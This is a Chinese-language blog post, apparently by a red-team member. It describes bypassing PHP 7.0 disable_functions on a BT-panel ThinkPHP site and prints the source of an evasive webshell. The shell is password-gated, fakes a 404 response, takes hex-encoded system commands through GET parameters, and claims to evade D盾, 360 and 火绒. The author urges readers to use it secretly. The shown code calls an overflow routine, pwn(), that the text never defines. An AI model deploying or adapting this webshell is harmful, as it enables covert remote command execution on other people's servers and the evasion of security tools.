演习还是很好玩的，红队更是有趣，遇到问题解决问题提高能力真让人心情愉悦。

比如这一次，我们在进行网站测试的时候遇到了BT+PHP7.0+ThinkPHP的操作，幸亏手里有ThinkPHP6的exp，但是传的“马儿”一个都不能跑，妈耶！宝友，这可不兴喂马儿吃草了呀！

我们想了想，决定分头行动，看看是哪里的原因，后来发现是BT设置了PHP7.0的disable_function,禁用了所有的系统函数，唉，还是国人最懂国人，这不就让人脑袋痛了吗，怎么办呢？

要不就换个不需要系统函数的“驴儿”，要不就想办法即执行系统函数还不用用到disable_function里面的，可是里面的很全呀！几乎包括了所有的系统命令操作函数了。于是我们就做出来了PHP7.0版本“金牌马儿”（免杀，过D盾，360，火绒等所有的工具），这个马儿之所以能跑，是因为用了PHP7.0的溢出漏洞，大家熟知的缓冲区溢出呀或者什么栈溢出。

就是因为有这个溢出，所以我们即过了免杀还不用担心执行系统命令函数的问题。下面是我放的代码，大家可以研究一下。如果有用的话，别忘记点赞收藏，切记！一定要偷偷的用！

<?php //仅支持php7.0 里面没有用到php系统函数，order参数可以执行系统命令，暂时只测试过linux //过宝塔、D盾、360、火绒，免杀原理自己看源码，上传时请先将源码加密，请勿外传 //SFang Team.->MrSun<-.Q群:324547242 function hexToStr($hex) { //16进制转字符串，敏感字符过防火墙 $str = ""; for ($i = 0;$i < strlen($hex) - 1;$i+= 2) $str.= chr(hexdec($hex[$i] . $hex[$i + 1])); return $str; } $password = $_GET['password']; $order = $_GET['order']; //因为测试方便，所以用的GET，如果变量过长，用POST if($password != 'SFangTeam')//密码比对，如果密码错误就返回404(区分大小写) { header('HTTP/1.1 404 Not Found'); header("status: 404 Not Found"); exit(); } $order = hexToStr($order); pwn($order);